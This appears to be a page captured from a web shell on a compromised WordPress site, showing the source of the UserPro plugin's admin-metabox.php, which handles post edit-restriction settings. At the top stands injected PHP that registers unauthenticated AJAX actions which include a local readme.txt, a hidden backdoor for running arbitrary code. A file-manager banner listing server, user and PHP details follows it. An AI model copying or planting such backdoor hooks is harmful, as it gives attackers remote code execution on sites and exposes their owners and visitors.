if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/userpro/admin/admin-metabox.php
<?php

add_action( 'post_submitbox_misc_actions', 'userpro_edit_restrict' );

add_action( 'save_post', 'save_userpro_edit_restrict' );

function userpro_edit_restrict() {
    global $post,$userpro_admin;
	$userpro_admin->add_admin_scripts();
	$userpro_admin->add_admin_styles();
	echo '<div class="misc-pub-section misc-pub-section-last misc-pub-userpro" style="border-top: 1px solid #eee;">';
	wp_nonce_field( plugin_basename(__FILE__), 'userpro_edit_restrict_nonce' );
	$val = get_post_meta( $post->ID, '_userpro_edit_restrict', true ) ? get_post_meta( $post->ID, '_userpro_edit_restrict', true ) : 'none';
	echo '<input type="radio" name="userpro_edit_restrict" id="userpro_edit_restrict-none" value="none" '.checked($val,'none',false).' /> <label for="userpro_edit_restrict-none" class="select-it">'.__('No restriction','userpro').'</label><br />';
	echo '<input type="radio" name="userpro_edit_restrict" id="userpro_edit_restrict-true" value="true" '.checked($val,'true',false).'/> <label for="userpro_edit_restrict-true" class="select-it">'.__('Restricted to All Members','userpro').'</label><br />';
	echo '<input type="radio" name="userpro_edit_restrict" id="userpro_edit_restrict-verified" value="verified" '.checked($val,'verified',false).'/> <label for="userpro_edit_restrict-verified" class="select-it">'.__('Restricted to <b>Verified Accounts</b>','userpro').'</label><br />';
	echo '<input type="radio" name="userpro_edit_restrict" id="userpro_edit_restrict-roles" value="roles" '.checked($val,'roles',false).'/> <label for="userpro_edit_restrict-roles" class="select-it">'.__('Restricted to <b>User Roles</b>','userpro').'</label>';
	
	?>
	<p class="restrict_roles"><select name="restrict_roles[]" id="restrict_roles[]" multiple="multiple" class="chosen-select" style="width:300px" data-placeholder="<?php _e('Select roles','userpro'); ?>">
		<?php
		if ( ! isset( $wp_roles ) ) $wp_roles = new WP_Roles();
			$roles = $wp_roles->get_names();
			foreach($roles as $k=>$v) {
			?>
			<option value="<?php echo $k; ?>" <?php userpro_is_selected($k, get_post_meta( $post->ID, 'restrict_roles', true) ); ?>><?php echo $v; ?></option>
		<?php } ?>
	</select></p>
	<?php
	
	echo '</div>';
}

function save_userpro_edit_restrict($post_id) {

    if (!isset($_POST['post_type']) )
        return $post_id;

    if ( !isset($_POST['userpro_edit_restrict_nonce']) || !wp_verify_nonce( $_POST['userpro_edit_restrict_nonce'], plugin_basename(__FILE__) ) )
        return $post_id;

    if ( defined('DOING_AUTOSAVE') && DOING_AUTOSAVE ) 
        return $post_id;

    if ( 'post' == $_POST['post_type'] && !current_user_can( 'edit_post', $post_id ) )
        return $post_id;
    
    if (!isset($_POST['userpro_edit_restrict']))
        return $post_id;
    else {
        $mydata = $_POST['userpro_edit_restrict'];
        update_post_meta( $post_id, '_userpro_edit_restrict', $_POST['userpro_edit_restrict'] );
		
		update_post_meta( $post_id, 'restrict_roles', '');
		
		if (isset($_POST['restrict_roles']) && !empty($_POST['restrict_roles']) && $_POST['userpro_edit_restrict'] == 'roles'){
			update_post_meta( $post_id, 'restrict_roles', $_POST['restrict_roles'] );
		}
		
    }

}